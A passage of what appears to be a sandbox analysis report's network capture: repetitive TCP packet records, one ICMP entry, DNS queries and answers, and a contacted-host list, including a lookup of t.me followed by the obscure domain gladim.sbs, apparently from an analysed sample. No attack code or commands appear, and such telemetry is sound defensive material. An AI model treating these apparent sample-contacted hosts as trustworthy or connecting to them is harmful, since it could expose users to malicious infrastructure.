                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.564888954 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.564898968 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.565355062 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.572715044 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.906510115 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.916379929 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.916394949 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.916480064 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.916785955 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:26.923950911 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.293704033 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.298270941 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.298312902 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.298429966 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.298713923 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.308918953 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.642088890 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.654375076 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.654452085 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.654544115 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.654849052 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.662365913 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:27.995573044 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.009160995 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.009174109 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.009232998 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.009650946 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.019093990 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.352480888 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.361180067 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.361192942 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.361294985 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.361517906 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.369990110 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.703763962 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.712910891 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.712970972 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.712994099 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.713407040 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:28.720992088 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.054363012 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.071511984 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.071906090 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.071984053 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.072017908 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.081785917 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.414843082 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.422931910 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.422950029 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.423021078 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.423306942 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.431503057 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.764597893 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.777712107 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.777720928 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.777857065 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.778161049 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:29.788558960 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.121726990 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.129829884 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.129904032 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.129920006 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.130232096 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.143208981 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.476906061 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.491065025 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.491096973 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.491214991 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.512388945 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.523380995 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.856421947 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.876776934 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.877187014 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.877757072 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.877870083 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:30.885139942 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.218374968 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.226933002 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.226969004 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.227051020 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.227334023 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.235959053 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.570564985 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.580538034 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.580607891 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.580693007 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.580883026 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.588748932 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.925200939 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.934412003 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.934468985 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.934729099 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.934809923 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:31.942821980 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.276953936 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.288744926 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.288768053 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.288809061 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.289077044 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.297925949 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.631093025 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.640481949 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.640583038 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.640645027 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.648936987 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.681788921 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:32.682965040 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.006169081 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.016558886 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.024622917 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.024636030 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.024741888 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.028485060 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.057890892 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.173959970 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.386002064 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.516649961 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.530050039 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.530252934 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.530358076 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.530397892 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.530402899 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.587790012 CET51030443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:33.887650013 CET44351030104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.727498055 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.727678061 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.727893114 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.727963924 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.728058100 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.728137970 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.754627943 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.755218983 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.867655993 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.868546009 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.907560110 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.088495970 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.088515997 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.088567019 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.088572025 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.089528084 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.089732885 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.097369909 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.097590923 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.097654104 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.097990990 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.158968925 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.206372023 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.235416889 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.431513071 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.432619095 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.432842970 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.433046103 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.433536053 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.433680058 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.492157936 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.494003057 CET44365443172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.532171011 CET65443443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.879409075 CET53605661.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.879064083 CET192.168.2.101.1.1.1c26e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:03.057374001 CET192.168.2.101.1.1.10xadc3Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:05.219243050 CET192.168.2.101.1.1.10x3d3cStandard query (0)gladim.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.276200056 CET192.168.2.101.1.1.10xecdaStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.276727915 CET192.168.2.101.1.1.10x3429Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.197287083 CET192.168.2.101.1.1.10x4ff7Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.197779894 CET192.168.2.101.1.1.10xd950Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:38.724714041 CET192.168.2.101.1.1.10xffe5Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:38.725002050 CET192.168.2.101.1.1.10x2e6aStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.099510908 CET192.168.2.101.1.1.10xf299Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.099880934 CET192.168.2.101.1.1.10xf08cStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863009930 CET192.168.2.101.1.1.10x16a6Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863146067 CET192.168.2.101.1.1.10xd696Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863470078 CET192.168.2.101.1.1.10x1db0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.863631964 CET192.168.2.101.1.1.10x95cbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.871835947 CET192.168.2.101.1.1.10x34abStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.872083902 CET192.168.2.101.1.1.10x7b69Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.716500998 CET192.168.2.101.1.1.10x719cStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.716686010 CET192.168.2.101.1.1.10x893aStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.741601944 CET192.168.2.101.1.1.10xbcb4Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.741799116 CET192.168.2.101.1.1.10x7be9Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.755563974 CET192.168.2.101.1.1.10x15acStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.756048918 CET192.168.2.101.1.1.10xc289Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.861432076 CET192.168.2.101.1.1.10x361bStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.861712933 CET192.168.2.101.1.1.10x6170Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.996802092 CET192.168.2.101.1.1.10x6cbStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.996936083 CET192.168.2.101.1.1.10x23ebStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:03.195478916 CET1.1.1.1192.168.2.100xadc3No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:05.556237936 CET1.1.1.1192.168.2.100x3d3cNo error (0)gladim.sbs94.130.210.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.413795948 CET1.1.1.1192.168.2.100xecdaNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:21.413911104 CET1.1.1.1192.168.2.100x3429No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.334372997 CET1.1.1.1192.168.2.100x4ff7No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.335916042 CET1.1.1.1192.168.2.100xd950No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.600542068 CET1.1.1.1192.168.2.100xc0f8No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.600542068 CET1.1.1.1192.168.2.100xc0f8No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:36.679189920 CET1.1.1.1192.168.2.100x93afNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:38.956468105 CET1.1.1.1192.168.2.100xffe5No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:38.963130951 CET1.1.1.1192.168.2.100x2e6aNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.327764988 CET1.1.1.1192.168.2.100xf08cNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.415492058 CET1.1.1.1192.168.2.100xf299No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:40.415492058 CET1.1.1.1192.168.2.100xf299No error (0)googlehosted.l.googleusercontent.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.000917912 CET1.1.1.1192.168.2.100x16a6No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.000917912 CET1.1.1.1192.168.2.100x16a6No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.000931025 CET1.1.1.1192.168.2.100xd696No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.001224995 CET1.1.1.1192.168.2.100x95cbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.001405001 CET1.1.1.1192.168.2.100x1db0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.001405001 CET1.1.1.1192.168.2.100x1db0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.009190083 CET1.1.1.1192.168.2.100x34abNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.009190083 CET1.1.1.1192.168.2.100x34abNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.009533882 CET1.1.1.1192.168.2.100x7b69No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.853707075 CET1.1.1.1192.168.2.100x719cNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.853707075 CET1.1.1.1192.168.2.100x719cNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.853707075 CET1.1.1.1192.168.2.100x719cNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.853707075 CET1.1.1.1192.168.2.100x719cNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.878969908 CET1.1.1.1192.168.2.100x7be9No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.880001068 CET1.1.1.1192.168.2.100xbcb4No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.893599987 CET1.1.1.1192.168.2.100xc289No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.893857956 CET1.1.1.1192.168.2.100x15acNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:41.999053001 CET1.1.1.1192.168.2.100x361bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:42.000103951 CET1.1.1.1192.168.2.100x6170No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:42.134773970 CET1.1.1.1192.168.2.100x6cbNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:42.135745049 CET1.1.1.1192.168.2.100x23ebNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      • t.me
                                                                                                                                                                                                                                                      • gladim.sbs
                                                                                                                                                                                                                                                      • otelrules.azureedge.net
                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                                                                                                                                      • fs.microsoft.com
